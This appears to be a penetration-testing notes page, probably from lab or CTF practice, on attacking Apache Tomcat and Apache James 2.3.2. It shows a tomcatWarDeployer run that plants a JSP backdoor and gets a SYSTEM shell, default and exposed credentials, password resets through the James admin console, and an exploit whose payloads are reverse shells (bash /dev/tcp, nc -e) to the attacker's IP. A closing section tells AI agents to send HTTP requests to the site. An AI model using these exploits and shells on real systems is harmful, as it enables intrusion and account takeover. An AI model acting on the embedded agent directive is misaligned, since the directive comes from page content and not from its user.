# Apache

## Home Directory

* <http://$IP/~mike>
* Apache may be configured to give users Home directory
* <https://httpd.apache.org/docs/2.4/howto/public_html.html>

## FreeBSD Apache

* <https://blog.codeasite.com/how-do-i-find-apache-http-server-log-files/>

```
/usr/local/www/apache24/data/
/var/log/httpd-error.log
/var/log/httpd-access.log
```

## Tomcat

```
Password is sometimes kept:
Directory where tomcat is installed
Directory starting with tomcat in /etc/
'tomcat-users.xml'

Example: /etc/tomcat7/tomcat-users.xml
Check: cat /etc/passwd .. see where tomcat profile lives
```

## tomcatWarDeployer

* Vuln: Apache Tomcat/7.0.88
* REF: JerryHTB
* <https://github.com/mgeeky/tomcatWarDeployer>
* git clone <https://github.com/mgeeky/tomcatWarDeployer.git>

```
Example: 
> python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080

python error: no module named 'mechanize'
>> sudo apt install python-pip
>> pip install mechanize

Again with Creds:
>> sudo python ./tomcatWarDeployer.py -v -x --user=tomcat --pass=s3cret -n hello2 -p 4449 -H 10.10.14.189 10.10.10.95:8080

==== JSP Backdoor ====
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/hello2/
INFO: 
Happy pwning. Here take that password for web shell: '8EWh0JeCrmN0'
INFO: ------------------------------------------------------------

SUCCESS!!!!!


http://10.10.10.95:8080/hello2/
8EWh0JeCrmN0

> whoami
nt authority\system

```

## Config Password

```

more C:\conf\tomcat-users.xml
more C:\apache-tomcat-7.0.88\tomcat-users.xml

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
   <user username="tomcat" password="s3cret" roles="tomcat, manager-gui"/>
   <user username="admin" password="admin" roles="role1, manager-status"/>
   <user username="jerry" password="tomcat" roles="role1, manager-status"/>
</tomcat-users>
```

## Apache James Server 2.3.2

* Java Apache Mail Enterprise Server (JAMES)
  * Open source SMTP and POP3 mail transfer agent and NNTP news server
  * <https://james.apache.org/>
  * Default Login: **root:root**
* Connect and Reset user-email password
* Then use [Thunderbird](/03-getting-in/email-smtp.md#thunderbird) email to look for clues

```
nc $IP 4555
admin:admin ..fail
root:root   ..ok
help
listusers
setpassword admin password
setpassword mindy password  ..next use thunderbird to read emails
```

* Exploit:

```
-------------------------
searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'

nc -nvlp 4444
python 35513.py $IP
ssh user@server  ..to pop the exploit

-------------------------
james will 
adduser ../../../etc/bash_completion.d
sends email to directory with our payload
when somebody logs in, payload gets executed
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/04-webapps/apache.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.